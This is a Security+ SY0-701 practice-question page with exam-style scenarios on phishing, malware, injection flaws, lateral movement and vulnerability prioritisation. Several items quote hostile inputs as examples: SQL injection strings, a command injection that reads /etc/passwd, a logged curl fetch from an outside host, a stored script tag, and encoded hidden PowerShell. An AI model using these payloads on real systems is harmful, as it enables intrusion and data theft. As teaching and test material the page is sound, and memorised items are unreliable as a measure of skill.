Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

← Threats, Vulnerabilities, and Mitigations practice sets

SY0-701 Threats, Vulnerabilities, and Mitigations • Complete Question Bank

SY0-701 Threats, Vulnerabilities, and Mitigations — All Questions With Answers

Complete SY0-701 Threats, Vulnerabilities, and Mitigations question bank — all 0 questions with answers and detailed explanations.

265
Questions
Free
No signup
Certifications/SY0-701/Practice Test/Threats, Vulnerabilities, and Mitigations/All Questions
Question 1mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst is reviewing web server logs from an e-commerce application. The logs show repeated requests containing URLs with appended strings such as: `' OR '1'='1' --` and `'; DROP TABLE Users; --`. The application returned HTTP 200 responses with unexpected data in several instances. Which type of attack is most likely being attempted?

Question 2mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst is reviewing the source code of a custom network service written in C. The service allocates a 256-byte buffer and uses the strcpy() function to copy incoming data into that buffer without verifying the length of the input. If an attacker sends a specially crafted payload that exceeds 256 bytes, which security control would be most effective at detecting and preventing the resulting exploitation at runtime?

Question 3mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A CFO at a mid-sized company receives an urgent email that appears to come from the CEO's email address, requesting an immediate wire transfer of $50,000 to a new vendor for a time-sensitive project. The email address displayed is 'ceo@cornpany.com' instead of the legitimate 'ceo@company.com'. The CFO follows the instruction and initiates the transfer. Later, the real CEO denies sending such a request. Which of the following security controls would have been MOST effective in preventing this type of attack from succeeding?

Question 4mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A user receives a phone call from someone who claims to be a member of the company's IT support team. The caller states that the user's account has been compromised and requests the user's username, password, and the current multi-factor authentication (MFA) code to 'verify identity and secure the account.' Which type of social engineering attack is being attempted?

Question 5mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst is reviewing the source code of a custom authentication service. The service uses a function that compares a user-supplied password to the stored password hash by iterating through each byte and returning false immediately upon the first mismatch. The analyst measures the function's execution time and discovers it varies measurably depending on how many initial bytes match. Which type of attack is this vulnerability most likely to facilitate?

Question 6mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst is reviewing the results of a dynamic application security test (DAST) on a new e-commerce application. The report indicates that the application's product search functionality is vulnerable to blind SQL injection. The analyst is tasked with recommending a remediation to the development team. The developers currently concatenate user input directly into SQL queries. Which of the following recommendations would most effectively and permanently mitigate this vulnerability?

Question 7mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst is reviewing authentication logs from a corporate web application. The logs show thousands of failed login attempts over the past hour. Each attempt uses a different username, but all attempts use the same password 'Spring2024!'. The source IP addresses are widely distributed across several different geographic regions. Which type of attack is the analyst most likely observing?

Question 8mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst is investigating a series of alerts from the web application firewall. Users are reporting that when they view a product review page on the company's e-commerce site, their browser automatically redirects to a malicious website. The analyst examines the database and finds that a product review submitted by a user contains a <script> tag that loads a JavaScript file from an external domain. Which type of attack has occurred?

Question 9mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst is reviewing the session management implementation of a web application. The application generates session tokens by computing the MD5 hash of the concatenation of the username and the current server timestamp rounded to the nearest hour. An attacker has obtained a valid session token for her own account and discovers that she can forge tokens for other users by simply substituting the username in the hash calculation with a known target username. Which type of attack is the web application most vulnerable to?

Question 10mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst is reviewing the source code of a custom web application. The application receives JSON data from users, which includes a 'type' field. The application uses the 'type' field to determine which Java class to instantiate, and then calls a method on that object. The application does not validate or sanitize the 'type' field. An attacker sends a crafted JSON payload that causes the application to instantiate an unexpected class, leading to remote code execution. Which type of vulnerability does this example describe?

Question 11mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst is investigating a phishing campaign that specifically targets senior executives in a company. The emails appear to come from the CEO and request urgent wire transfers to a fraudulent account. Which of the following best describes this type of attack?

Question 12mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst discovers that an organization's web application is vulnerable to SQL injection. The application uses a legacy database driver that does not support parameterized queries. Which of the following is the BEST mitigation to prevent this vulnerability?

Question 13mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst reviews authentication logs and discovers hundreds of failed login attempts from a single external IP address within a five-minute window. All attempts target the same username 'jsmith' but use different passwords. Which type of password attack does this pattern most likely indicate?

Question 14mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst discovers that an attacker maintained persistent access to a corporate network for six months, moving laterally between systems and exfiltrating sensitive data. The attacker used custom malware that evaded antivirus and established multiple backdoors. Which of the following best describes this type of threat actor and their campaign?

Question 15mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst reviews authentication logs and notices multiple failed login attempts using various usernames from a single IP address over several hours. Eventually, a successful login occurs using a username that had many failed attempts. The organization requires multi-factor authentication (MFA). Which type of attack is most likely indicated by this pattern?

Question 16mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst receives an alert from the email security gateway about a message sent to an employee. The email has an attachment named 'Invoice_Q4_2024.exe'. The employee claims they did not open the attachment, and the email appears to come from a known vendor's domain but the sender address has a slight typo. Which type of attack is most likely being attempted?

Question 17mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst notices that several employees have received an email with the subject line 'Urgent: Password Reset Required'. The email contains a link to a website that mimics the company's internal login portal. The email was sent from an external domain and addresses recipients by 'Dear Employee' rather than their actual names. Which type of social engineering attack is being described?

Question 18mediummultiple choice
Read the full NAT/PAT explanation →

A security analyst receives an alert about a user account attempting to access multiple network shares in rapid succession within a short time frame. The analyst reviews the logs and sees that the IP address originates from the internal network, but the user is currently on leave. Which type of attack is most likely occurring?

Question 19mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst receives a phone call from an individual claiming to be a member of the IT help desk. The caller states that an emergency security update requires the analyst's password immediately, and the request sounds urgent. The analyst notices the caller's voice is unfamiliar and the background noise is inconsistent with an office environment. Which type of social engineering attack is being attempted?

Question 20mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst is investigating a web application that allows users to input a filename to view its contents. The application passes the user input directly to a system command without sanitization. An attacker submits the input 'file.txt; cat /etc/passwd' and successfully retrieves the contents of the password file. Which type of attack occurred?

Question 21mediummultiple choice
Read the full DNS explanation →

A security analyst receives reports that several employees are being redirected to a fraudulent login page after typing the correct URL for a company application into their browser. Further investigation reveals that the company's internal DNS server has been compromised. Which type of attack best describes this scenario?

Question 22mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst is reviewing logs after a successful phishing attack. The attacker used a fake login page that mimicked the company's single sign-on portal to harvest usernames and passwords. The attacker then used the stolen credentials to access the corporate email system. Which type of attack best describes the initial compromise?

Question 23mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst observes repeated outbound traffic from a single workstation to a known malicious IP address. The workstation's anti-malware software has reported no alerts, and the user claims to have only downloaded software from the company's approved application store. Which type of malware most likely explains this behavior?

Question 24easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what should the employee do first?

Exhibit

Email message
From: Payroll Support <payroll-help@vendor-portal.example>
Subject: Urgent: Verify your account now
Body: We detected a payroll issue. Reply with the one-time code we just sent to your phone so we can restore your mailbox today. Failure to act within 10 minutes may suspend access.
Question 25easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An employee receives an email that appears to come from the company's payroll provider. It says payroll documents will be deleted today unless the employee signs in through the included link. What is the best first action?

Question 26easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk technician reports several workstations are suddenly showing lots of pop-up ads and browser redirects after users installed a free media player. What type of unwanted software is most likely present?

Question 27mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A threat intelligence feed says an adversary rotates domains daily, uses cloud VPS hosting, and reuses the same malware sample across several campaigns. Analysts want the indicator that remains useful even when the domain changes. What should they prioritize?

Question 28easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what type of social engineering attack is the caller using?

Exhibit

Help desk call transcript
Caller: "Hi, this is Morgan from the executive assistant team. The CFO is in a meeting and needs a transfer completed in the next 15 minutes. I am sending the approval right now. Please confirm the wire amount and account details over the phone so I can finish the request."
Question 29easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A user says their files suddenly have a new extension and a note appears demanding payment to restore access. Which type of malware is most likely involved?

Question 30mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An employee receives a text message from an unknown number pretending to be IT. It includes a shortened URL for "urgent MFA re-enrollment" and says the account will be locked in 15 minutes. What is the best response?

Question 31easymultiple choice
Read the full DNS explanation →

A security tool reports repeated DNS requests for long, random-looking subdomains under the same domain name. What is the most likely explanation?

Question 32mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

EDR alerts show a finance laptop spawning an unsigned executable from %AppData%, attempting to read LSASS memory, and making outbound HTTPS connections to a rare domain. The user says they only opened a spreadsheet attachment. What is the best immediate action?

Question 33mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An attacker calls the service desk claiming to be a traveling contractor whose phone was stolen. They know the contractor's manager name and ask for an MFA reset to a new number 'just for today.' Which control would best reduce the success of this attack?

Question 34mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A caller claims to be from the company's SaaS provider and says a tenant migration will fail unless the help desk reads back a one-time verification code sent to an administrator's phone. The caller knows the admin's name and ticket number. What attack technique is being used?

Question 35easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Threat intelligence shows an attacker changes the domain name every day, but the malware file hash stays the same across incidents. What should defenders prioritize for blocking?

Question 36mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Finance staff receive an email from the 'CFO' using a lookalike domain. The message requests an urgent gift-card purchase, says the recipient must keep it confidential, and pressures them to skip normal approval steps. What attack is this most likely?

Question 37hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which indicator should the security team prioritize for endpoint detection and hunting?

The attacker rotates infrastructure frequently, but one artifact has remained consistent across recent investigations.

Exhibit

Threat intelligence note:
- Delivery domains change daily using disposable VPS providers
- File hashes vary because the payload is repacked for each campaign
- Email lure wording changes weekly
- The malware consistently creates a mutex named `Global\WkSvcHost_0F92`
- One case also showed a registry key under `HKCU\Software\SysTools\Cache` but that key was not present in every sample
Question 38hardmulti select
Read the full NAT/PAT explanation →

A support portal lets users upload files and name them manually. During review, a tester submits a filename containing path traversal sequences, and logs later show the application trying to access files outside the intended upload folder. Which two changes best address the flaw? Select two.

Question 39easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A finance manager gets a phone call from someone claiming to be the CEO's assistant, urgently requesting a wire transfer before a board meeting. What type of attack is this?

Question 40mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A threat report says an attacker changes domains daily and rehosts infrastructure in cloud VPS environments, but the phishing email wording, login-page flow, and PowerShell download behavior remain the same. What type of information is most useful for a durable detection rule?

Question 41mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A workstation opens an attachment labeled as an invoice and then begins creating scheduled tasks, disabling security services, and contacting a known malicious IP address. What is the best first containment action?

Question 42mediummultiple choice
Read the full VPN explanation →

A user's laptop suddenly shows encrypted .docx files, a ransom note, and the EDR console reports mass file renames and shadow copy deletion. The device is still online and connected to the corporate VPN. What is the best immediate action?

Question 43easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A caller says they are from the help desk and need the employee's MFA code to "complete a password reset". Which social engineering technique is being used?

Question 44mediummultiple choice
Read the full VPN explanation →

A vulnerability scan finds two issues: a critical deserialization flaw on a non-production lab server behind a VPN, and a high-severity privilege escalation flaw on the production jump server that administrators use to reach the rest of the environment. Which should be remediated first?

Question 45hardmulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A report generator accepts a user-supplied report name and then passes it into a shell command to convert a file. During testing, a malicious value causes the server to run an unexpected system command. Which two changes best mitigate this issue while keeping the feature usable? Select two.

Question 46hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what is the BEST fix for the vulnerability being exploited?

A user with a standard account can retrieve documents by changing the `docId` value in the request. The application returns another employee's file without any authorization error.

Exhibit

Web server access log excerpt:
10:41:12 GET /portal/document?docId=4411 200 user=jcarter
10:41:14 GET /portal/document?docId=4412 200 user=jcarter
10:41:15 GET /portal/document?docId=4413 200 user=jcarter

Application debug log:
[INFO] Document lookup completed successfully.
[WARN] No authorization check performed after object lookup.
[INFO] Returned file owner: finance2
Question 47easymultiple choice
Review the full subnetting walkthrough →

A vulnerability scan finds a critical flaw on an internet-facing SFTP gateway with public exploit code, and a high-severity flaw on an internal lab server that is only reachable from a restricted subnet. Which should be remediated first?

Question 48hardmulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A file server used by a shared service account begins renaming documents, deleting shadow copies, and creating outbound SMB connections to many internal hosts. The SOC suspects the malware may be spreading while also encrypting data. Which two actions are the best immediate containment steps? Select two.

Question 49easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A workstation suddenly begins making SMB connections to many internal servers within a few minutes. What is the best immediate response?

Question 50easymultiple choice
Read the full VPN explanation →

A vulnerability scan finds a critical flaw on an internet-facing VPN appliance and says public exploit code is already available. Which issue should be remediated first?

Question 51hardmultiple choice
Read the full NAT/PAT explanation →

Based on the exhibit, what is the MOST likely activity taking place on the network?

A user opened a spreadsheet shortly before unusual internal connection patterns began. The same account is now authenticating to many hosts in rapid succession.

Exhibit

NetFlow and Windows event excerpt:
Host: WS-22 (10.20.5.18)
14:31 10.20.5.18 -> 10.20.5.41 TCP/445
14:32 10.20.5.18 -> 10.20.5.43 TCP/5985
14:32 10.20.5.18 -> 10.20.5.47 TCP/445
14:33 10.20.5.18 -> 10.20.5.52 TCP/5985
14:34 10.20.5.18 -> 10.20.5.61 TCP/445

Security log highlights:
Event 4769 spike for user ACME\rlopez
Event 7045: Service created on 10.20.5.43 named "PSEXESVC"
Multiple hosts show remote logon type 3 from WS-22
Question 52mediummultiple choice
Read the full NAT/PAT explanation →

A development team wants to allow users to search orders by customer name and date range. Logs show the team currently concatenates the filter values into SQL strings. Which change best reduces SQL injection risk without removing the search feature?

Question 53easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what type of malware is most likely present?

Exhibit

Host activity log
11:22:08  Command executed: vssadmin delete shadows /all /quiet
11:22:15  Files in Finance share renamed with extension .enc
11:22:21  Ransom note created: READ_ME_NOW.txt
11:22:28  Multiple user documents no longer open correctly
Question 54mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A file-sharing portal uses a download URL like /download?file=12345. A tester changes the value to 12346 and can access another department's document without logging in again. Which control most directly prevents this issue?

Question 55hardmulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An EDR alert shows a finance workstation launching rundll32 from %AppData%, creating a scheduled task, and making repeated HTTPS beacons to a rare domain. The user still has open accounting files, and the SOC wants to slow spread without losing evidence. What two actions should be taken first? Select two.

Question 56easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An employee receives an email that appears to come from payroll and asks them to open a link to "confirm direct deposit details". The link goes to a site with a slightly misspelled company name. What should the employee do first?

Question 57easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which indicator should defenders prioritize for detecting future activity from this campaign?

Exhibit

Threat intelligence note
Campaign summary:
- Malicious domains change every 24 hours
- Executable file hash stays the same across samples
- TLS certificate fingerprint remains:
  4F:91:2C:AA:7D:10:88:6B:...
- User agent string varies by host
Question 58mediummultiple choice
Read the full VPN explanation →

A scan reports a critical remote code execution vulnerability on an internet-facing VPN appliance with public proof-of-concept exploit code available. It also reports a critical local privilege escalation on an isolated lab workstation. Patch windows are limited this week. Which should be remediated first?

Question 59easymultiple choice
Read the full wireless explanation →

A user's laptop suddenly starts renaming many files and showing a ransom note. The laptop is still connected to Wi-Fi. What is the best immediate action?

Question 60hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what is the BEST remediation for the application flaw shown?

A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.

Exhibit

Application log excerpt:
15:08:02 POST /tools/pingHost host=10.0.0.15
15:08:02 Application executed: /bin/sh -c "ping -c 1 10.0.0.15"
15:09:11 POST /tools/pingHost host=10.0.0.15;curl%20http://198.51.100.55/s
15:09:11 Application executed: /bin/sh -c "ping -c 1 10.0.0.15;curl http://198.51.100.55/s"
15:09:12 Outbound HTTPS session established to 198.51.100.55
Question 61easymultiple choice
Read the full network assurance explanation →

NetFlow shows one workstation opening SMB connections to a dozen internal servers and then attempting many WinRM connections. What is the most likely explanation?

Question 62mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A user reports receiving repeated MFA push requests even though they are not logging in. Later, someone calls and claims to be IT, asking the user to approve one prompt so support can finish a password reset. Which control would best reduce the success of this attack?

Question 63easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

During testing, a login form returns all user records when the tester enters ' OR '1'='1 in a username field. What is the best fix for this issue?

Question 64hardmulti select
Open the full VLAN trunking answer →

A scan returns five findings. Which two should be remediated first based on real-world risk? Select two. A) Internet-facing SSO gateway, CVSS 8.8, public exploit code, and auth bypass impact. B) Internal print server, CVSS 9.8, no known exploit, isolated VLAN, no sensitive data. C) File server with regulated customer records, CVSS 6.5, active exploitation in the wild, reachable from VPN. D) Lab hypervisor, CVSS 7.5, no exploit, scheduled retirement next month, used only by testers. E) Dev wiki, CVSS 5.0, no exploit, no sensitive data.

Question 65mediummultiple choice
Read the full network assurance explanation →

NetFlow shows one user workstation making authenticated SMB and WinRM connections to more than 40 internal hosts within 15 minutes, starting shortly after the user opened a spreadsheet attachment. No approved admin tool was running on the device. What is the best initial response?

Question 66mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

SIEM alerts show one workstation making SMB connections to 30 internal hosts within 10 minutes, followed by remote service creation and repeated access attempts to admin shares. The workstation also begins authenticating with several privileged accounts. What is the most likely activity?

Question 67mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

During testing, entering ' OR '1'='1 into a login field returns all user records instead of rejecting the input. What is the best fix to address this flaw?

Question 68mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

After a new search feature goes live, logs show requests containing `UNION SELECT` and the application returns database error messages. Security testing confirms attackers can retrieve rows from other tables by modifying the query string. Which fix is best?

Question 69mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Threat intelligence reports that an adversary changes domains daily and uses disposable cloud hosting, but the malware binary hash and a unique mutex name remain unchanged across incidents. Which indicator is the best candidate for immediate detection rule creation?

Question 70easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A user's laptop starts renaming many documents, and a ransom note appears on the desktop. What is the best immediate action for the help desk to recommend?

Question 71hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what is the BEST immediate containment action?

The workstation is still powered on, and the user reports that files are being renamed and the system is running very slowly. The security analyst confirms malicious activity is in progress.

Exhibit

EDR event timeline:
14:02:11 excel.exe spawned powershell.exe with -enc parameter
14:02:13 powershell.exe created scheduled task: "OneDrive Update"
14:02:18 explorer.exe began renaming multiple .docx files to .lock
14:02:21 outbound HTTPS connection to 198.51.100.77:443
14:02:24 security service attempted to terminate, then recovered
Question 72mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

During triage, you see a legitimate browser process spawning powershell.exe with an encoded command, followed by an outbound connection to a newly registered domain. No new executable is written to disk. Which malware characteristic best fits this behavior?

Question 73easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A user reports that their laptop is showing frequent pop-up ads, the browser homepage keeps changing, and the system has become noticeably slower. What is the most likely immediate containment action?

Question 74mediummultiple choice
Read the full network assurance explanation →

NetFlow shows one workstation initiating SMB and WinRM sessions to 25 internal servers within 12 minutes, followed by a spike in Kerberos authentication requests and attempts to access admin shares. The user says they only opened an invoice spreadsheet. What is the most likely attacker objective?

Question 75easymultiple choice
Read the full VPN explanation →

A scan finds two issues: a critical vulnerability on an internet-facing VPN appliance with public exploit code, and a medium-severity issue on an internal test server. Which should be fixed first?

Question 76easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Threat intelligence shows an attacker changes domains every day, but the malware file itself stays the same across incidents. Which indicator would be the best to block immediately if you find it in your environment?

Question 77hardmulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Threat intelligence reports a campaign that rotates domains daily and repacks the malware for each delivery. Analysts also observe the same TLS certificate fingerprint, the same mutex name, and the same JA3 client fingerprint across multiple samples. Which three indicators are most useful to prioritize for hunting or blocking? Select three.

Question 78easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Analysts see a malware campaign that changes its command-and-control domain every day, but the executable hash and a unique registry value remain the same across incidents. Which indicator is the best candidate for hunting?

Question 79easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A worker receives a text message from someone claiming to be the company's HR partner. The message says a benefits portal issue will be fixed only if the worker clicks a link and logs in right away. What type of attack is this most likely?

Question 80mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A procurement clerk receives a text message from someone claiming to be a supplier account manager. The message says a recent payment failed and asks the clerk to update bank details through a link to a secure portal. What should the clerk do first?

Question 81hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which issue should be remediated FIRST?

The team can only fully fix one issue today. Management wants the choice that best reduces real-world risk, not just the highest severity score.

Exhibit

Vulnerability scan summary:

1) Internet-facing VPN appliance
   CVSS: 8.8
   Exploit status: public proof-of-concept available
   Exposure: reachable from the internet
   Compensating controls: none

2) Internal HR file server
   CVSS: 9.8
   Exploit status: no public exploit yet
   Exposure: reachable only from the employee VLAN
   Compensating controls: segmented network and MFA for admin access

3) Lab workstation
   CVSS: 10.0
   Exploit status: public exploit available
   Exposure: isolated lab VLAN with no routing to production

4) DMZ reporting server
   CVSS: 7.5
   Exploit status: public exploit available
   Exposure: internet-reachable, but protected by WAF and IP allowlisting
Question 82easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A SIEM alert shows one workstation connecting to many internal systems over SMB in a short period of time, followed by attempts to access administrative shares. What is the best response?

Question 83hardmulti select
Review the full routing breakdown →

An accounts payable clerk receives an email that appears to come from a long-time vendor. The message asks for an urgent change to bank routing information, says the CFO is traveling, and requests that no one call back because the matter is confidential. The display name looks legitimate, but the reply-to address is different from the sender identity. Which three findings most strongly indicate a pretexting or business email compromise attempt? Select three.

Question 84hardmultiple choice
Read the full DNS explanation →

Based on the exhibit, what is the MOST likely explanation for the network traffic?

The affected host is not showing a large amount of internet-bound traffic, but its DNS behavior is highly unusual.

Exhibit

DNS query log excerpt:
Host: CORP-LT-17
16:18:02 a9f3d1k2d.update-check.com A NXDOMAIN
16:18:03 b7p9q2s1n.update-check.com A NXDOMAIN
16:18:04 k8z1m4c7r.update-check.com A NXDOMAIN
16:18:05 u3n6t9x0v.update-check.com A NXDOMAIN
16:18:06 9q2m7a4p1.update-check.com A NXDOMAIN

Proxy log excerpt:
No corresponding HTTP or HTTPS sessions observed
TTL observed: 60 seconds on all queries
Question 85mediummultiple choice
Read the full VPN explanation →

A scan finds two issues: a critical flaw on a lab server reachable only through VPN, and a high-severity flaw on an internet-facing file transfer appliance with active exploitation in the wild. Which should be remediated first?

Question 86hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what is the BEST response by the employee?

The message appears to come from a trusted internal support team, but the sender details and request do not align with normal procedures.

Exhibit

Email header and body excerpt:
From: "IT Helpdesk" <help@corp-support.example>
Reply-To: support@mail-secure-login.com
Subject: URGENT: MFA re-sync required

Body:
"Your mailbox will be suspended in 15 minutes. To complete the repair, reply with the 6-digit code that was just sent to your phone. If you do not respond now, your account will be locked."
Question 87mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security team suspects a rootkit after seeing hidden processes, boot-time persistence, and altered system files on a laptop. What is the best next step after confirming the suspicion?

Question 88easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A web form stores a user's comment and later displays it to other users. A tester submits <script>alert(1)</script> and the script runs in the browser. What vulnerability is this?

Question 89easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An employee receives an email from someone claiming to be from IT. The message says the employee must read back a one-time verification code so their mailbox can be 'repaired.' What social engineering technique is being used?

Question 90hardmulti select
Read the full network assurance explanation →

NetFlow and authentication logs show one workstation opening SMB and WinRM sessions to many internal hosts within ten minutes. The same source also generates a sharp rise in Kerberos service-ticket requests and attempts to access administrative shares. Which three observations most strongly support lateral movement rather than normal admin activity? Select three.

Question 91hardmultiple choice
Read the full NAT/PAT explanation →

A Java web service accepts a Base64-encoded `profile` object from the browser. During testing, changing a serialized field from `role=user` to `role=admin` causes a deserialization error unless the original signed blob is reused. When a captured valid blob is modified only slightly, the application reconstructs a different class and then exposes an internal admin page. Which attack pattern is most likely?

Question 92mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk technician reviews a ticket where a user says they logged out of the payroll portal, but another employee who found the session cookie in a browser debug log could still access the account until the session expired. Which attack best matches this behavior?

Question 93mediummultiple choice
Read the full NAT/PAT explanation →

A web login form uses unsanitized input in the backend query. When an attacker enters `' OR '1'='1'--` into the username field, the application grants access without a valid password. Which attack pattern is being used?

Question 94mediummultiple choice
Read the full NAT/PAT explanation →

A public-facing file transfer server is running an appliance firmware version that is now end-of-life. The vendor has stated that no further security patches will be released. Management wants the best long-term fix before the next audit. What should be done?

Question 95easymultiple choice
Read the full NAT/PAT explanation →

A forum lets users save a profile signature. One user enters a string containing script code, and later other users who view that profile see the script run in their browsers. What attack is this?

Question 96mediummultiple choice
Open the full VLAN trunking answer →

During troubleshooting, several hosts in VLAN 20 lose access to the default gateway at random. Their ARP caches now map the gateway IP to a workstation MAC address, and traffic briefly flows through that workstation before timing out. What attack is most likely?

Question 97mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what type of malware behavior is most likely occurring?

Exhibit

EDR timeline from a finance laptop:

08:14:02 winword.exe launched powershell.exe
08:14:03 powershell.exe executed with arguments: -WindowStyle Hidden -NoProfile -EncodedCommand SQBFAFgAKAAuLi4=
08:14:05 No new executable written to disk
08:14:08 Outbound HTTPS connection to 198.51.100.77 over port 443
08:14:11 User reports a document opened normally, but the machine began showing unusual network activity
Question 98easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A vulnerability scan reports that a public web server is running an operating system version that no longer receives security updates. Which issue is present?

Question 99hardmultiple choice
Read the full DHCP explanation →

After a switch reboot in a conference room, several laptops obtain valid IP addresses in the correct subnet, but their default gateway changes to 10.20.40.50, which is not the legitimate router. Packet capture shows DHCP offers coming from a MAC address that does not belong to the approved DHCP server, and the rogue device responds faster than the real server. What attack is most likely occurring?

Question 100mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what type of web attack is most likely taking place?

Exhibit

Web application log excerpt:

Request: GET /search?q=acme' OR '1'='1'-- HTTP/1.1
Response: 500 Internal Server Error
Database log: syntax error near "OR" at line 1
Developer note: the search feature appends user input directly into the SQL query string without parameterization.
Question 101easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A web portal builds its database query by directly appending a user's search input. When the user types a single quote, the application returns a database error. Which attack is most likely?

Question 102easymultiple choice
Read the full wireless explanation →

At a conference, employees connect to a Wi-Fi network named "CorpGuest" and then see certificate warnings in their browsers. The network has a stronger signal than the hotel's legitimate guest Wi-Fi. What attack is this?

Question 103mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, what security issue is most likely present?

Exhibit

Configuration review output from a new network camera deployment:

Interface status:
  0.0.0.0:8080   LISTEN  camera-web
  0.0.0.0:554    LISTEN  rtsp-stream
Admin banner:
  Firmware version 1.0.3
  Admin login: enabled
  Password policy: not enforced
Firewall ACL:
  allow tcp any any eq 8080
